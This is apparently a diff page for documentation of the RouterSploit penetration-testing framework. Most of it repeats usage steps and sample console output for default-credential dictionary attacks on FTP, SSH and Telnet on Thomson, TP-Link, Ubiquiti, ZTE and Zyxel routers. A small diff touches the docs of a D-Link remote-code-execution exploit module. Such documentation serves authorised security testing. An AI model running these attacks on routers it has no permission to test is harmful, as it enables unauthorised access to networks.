[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Thomson Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/thomson/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/thomson/telnet_default_creds
rsf (Thomson Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Thomson Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against TP-Link Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/tplink/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/tplink/ftp_default_creds
rsf (TP-Link Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (TP-Link Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against TP-Link Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/tplink/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/tplink/ssh_default_creds
rsf (TP-Link Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (TP-Link Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against TP-Link Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/tplink/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/tplink/telnet_default_creds
rsf (TP-Link Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (TP-Link Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Ubiquiti Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/ubiquiti/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/ubiquiti/ftp_default_creds
rsf (Ubiquiti Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Ubiquiti Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Ubiquiti Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/ubiquiti/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/ubiquiti/ssh_default_creds
rsf (Ubiquiti Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Ubiquiti Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Ubiquiti Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/ubiquiti/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/ubiquiti/telnet_default_creds
rsf (Ubiquiti Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Ubiquiti Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against ZTE Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/zte/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/zte/ftp_default_creds
rsf (ZTE Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (ZTE Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against ZTE Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/zte/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/zte/ssh_default_creds
rsf (ZTE Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (ZTE Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against ZTE Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/zte/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/zte/telnet_default_creds
rsf (ZTE Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (ZTE Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Zyxel Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/zyxel/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/zyxel/ftp_default_creds
rsf (Zyxel Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Zyxel Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Zyxel Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/zyxel/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/zyxel/ssh_default_creds
rsf (Zyxel Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Zyxel Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Zyxel Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/zyxel/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/zyxel/telnet_default_creds
rsf (Zyxel Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Zyxel Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
......@@ -7,7 +7,7 @@ Vulnerable firmwares are 1.01 up to 1.03.
1. Start `./rsf.py`
2. Do: `use exploits/routers/dlink/dsl_2750b_rce`
3. Do: `set target [RouterIP]`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If router is vulnerable, it should be possible to execute commands on operating system level.
......
[tox]
skipsdist = True
envlist = py36
[testenv]
deps =
pytest
-r{toxinidir}/requirements.txt
commands=python -m pytest -n16 tests/
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment